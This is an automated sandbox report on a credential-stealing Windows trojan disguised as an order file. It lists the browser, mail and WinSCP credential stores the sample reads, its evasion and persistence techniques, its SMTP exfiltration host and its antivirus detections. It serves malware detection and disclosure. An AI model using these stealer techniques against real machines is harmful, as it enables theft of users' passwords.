                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.2590e50.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.3477414.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.289658c.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.3190e28.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.77b0000.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.349648c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.77b0000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.28587d0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.7a40000.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.4169970.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.25a0e5c.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.28497a0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.34586d0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.284e7b8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1682578950.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1714009771.000000000281D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1682974196.0000000007A40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1714009771.0000000002896000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1678263931.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1714009771.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1678263931.0000000003458000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1679354233.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1714009771.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1678263931.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1678263931.0000000003496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\Order 19A20060.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.44d8f00.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.4513b20.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.Order 19A20060.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4097970191.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Order 19A20060.exe PID: 7420, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Order 19A20060.exe PID: 7872, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: SgJzugoOJvLgL.exe PID: 1236, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.44d8f00.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.4513b20.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4097970191.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4097970191.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Order 19A20060.exe PID: 7420, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Order 19A20060.exe PID: 7872, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: SgJzugoOJvLgL.exe PID: 1236, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.3190e28.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.289658c.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.2590e50.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.349648c.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.347842c.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.31a0e40.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.7a40000.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.25a0e5c.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.31a0e40.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.4169970.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.2590e50.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.3477414.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.289658c.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.3190e28.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.77b0000.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.349648c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.77b0000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.28587d0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.7a40000.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.4169970.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.25a0e5c.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.28497a0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.34586d0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.284e7b8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1682578950.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1714009771.000000000281D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1682974196.0000000007A40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1714009771.0000000002896000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1678263931.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1714009771.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1678263931.0000000003458000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1679354233.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1714009771.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1678263931.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1678263931.0000000003496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        11
                        Disable or Modify Tools
                        1
                        OS Credential Dumping
                        1
                        File and Directory Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        111
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        21
                        Input Capture
                        24
                        System Information Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Scheduled Task/Job
                        3
                        Obfuscated Files or Information
                        1
                        Credentials in Registry
                        1
                        Query Registry
                        SMB/Windows Admin Shares1
                        Email Collection
                        1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                        Software Packing
                        NTDS211
                        Security Software Discovery
                        Distributed Component Object Model21
                        Input Capture
                        2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Timestomp
                        LSA Secrets1
                        Process Discovery
                        SSH1
                        Clipboard Data
                        23
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading
                        Cached Domain Credentials141
                        Virtualization/Sandbox Evasion
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Masquerading
                        DCSync1
                        Application Window Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                        Virtualization/Sandbox Evasion
                        Proc Filesystem1
                        System Network Configuration Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                        Process Injection
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1399297 Sample: Order 19A20060.exe Startdate: 27/02/2024 Architecture: WINDOWS Score: 100 46 mail.elec-qatar.com 2->46 48 api.ipify.org 2->48 54 Snort IDS alert for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 15 other signatures 2->60 8 SgJzugoOJvLgL.exe 5 2->8         started        11 Order 19A20060.exe 7 2->11         started        signatures3 process4 file5 62 Multi AV Scanner detection for dropped file 8->62 64 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->64 66 Machine Learning detection for dropped file 8->66 14 SgJzugoOJvLgL.exe 8->14         started        17 schtasks.exe 8->17         started        19 SgJzugoOJvLgL.exe 8->19         started        21 SgJzugoOJvLgL.exe 8->21         started        42 C:\Users\user\AppData\...\SgJzugoOJvLgL.exe, PE32 11->42 dropped 44 C:\Users\user\AppData\Local\...\tmp514A.tmp, XML 11->44 dropped 68 Adds a directory exclusion to Windows Defender 11->68 70 Injects a PE file into a foreign processes 11->70 23 Order 19A20060.exe 15 2 11->23         started        26 powershell.exe 22 11->26         started        28 powershell.exe 23 11->28         started        30 schtasks.exe 1 11->30         started        signatures6 process7 dnsIp8 72 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->72 74 Tries to steal Mail credentials (via file / registry access) 14->74 76 Tries to harvest and steal browser information (history, passwords, etc) 14->76 32 conhost.exe 17->32         started        50 mail.elec-qatar.com 50.87.139.143, 49735, 49739, 587 UNIFIEDLAYER-AS-1US United States 23->50 52 api.ipify.org 104.26.12.205, 443, 49734, 49738 CLOUDFLARENETUS United States 23->52 78 Installs a global keyboard hook 23->78 34 conhost.exe 26->34         started        36 WmiPrvSE.exe 26->36         started        38 conhost.exe 28->38         started        40 conhost.exe 30->40         started        signatures9 process10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Order 19A20060.exe68%ReversingLabsByteCode-MSIL.Trojan.Taskun
                        Order 19A20060.exe38%VirustotalBrowse
                        Order 19A20060.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe68%ReversingLabsByteCode-MSIL.Trojan.Taskun
                        C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe38%VirustotalBrowse
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        mail.elec-qatar.com2%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                        http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/00%Avira URL Cloudsafe
                        http://mail.elec-qatar.com0%Avira URL Cloudsafe
                        http://mail.elec-qatar.com2%VirustotalBrowse
                        http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                        http://www.zhongyicts.com.cn1%VirustotalBrowse
                        http://www.founder.com.cn/cn0%VirustotalBrowse
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/01%VirustotalBrowse
                        http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ipify.org
                        104.26.12.205
                        truefalse
                          high
                          mail.elec-qatar.com
                          50.87.139.143
                          truetrueunknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/?Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/bTheOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://account.dyn.com/Order 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4094342515.0000000000428000.00000040.00000400.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers?Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.tiro.comOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designersOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.goodfont.co.krOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.ipify.org/tOrder 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.chiark.greenend.org.uk/~sgtatham/putty/0Order 19A20060.exe, SgJzugoOJvLgL.exe.0.drfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.carterandcone.comlOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sajatypeworks.comOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.typography.netDOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cn/cTheOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.galapagosdesign.com/staff/dennis.htmOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://api.ipify.orgOrder 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4094342515.0000000000428000.00000040.00000400.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cnOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designers/frere-user.htmlOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.jiyu-kobo.co.jp/Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://mail.elec-qatar.comOrder 19A20060.exe, 00000008.00000002.4097970191.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • 2%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/DPleaseOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fonts.comOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.sandoll.co.krOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.urwpp.deDPleaseOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cnOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 1%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrder 19A20060.exe, 00000000.00000002.1678263931.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 00000009.00000002.1714009771.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.sakkal.comOrder 19A20060.exe, 00000000.00000002.1681895785.0000000005C10000.00000004.00000020.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.26.12.205
                                                        api.ipify.orgUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        50.87.139.143
                                                        mail.elec-qatar.comUnited States
                                                        46606UNIFIEDLAYER-AS-1UStrue
                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1399297
                                                        Start date and time:2024-02-27 10:08:08 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 10m 31s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:20
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:Order 19A20060.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@23/15@2/2
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 97%
                                                        • Number of executed functions: 222
                                                        • Number of non-executed functions: 30
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        TimeTypeDescription
                                                        09:08:57Task SchedulerRun new task: SgJzugoOJvLgL path: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                        10:08:55API Interceptor9746488x Sleep call for process: Order 19A20060.exe modified
                                                        10:08:57API Interceptor26x Sleep call for process: powershell.exe modified
                                                        10:08:59API Interceptor8075865x Sleep call for process: SgJzugoOJvLgL.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        104.26.12.205SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
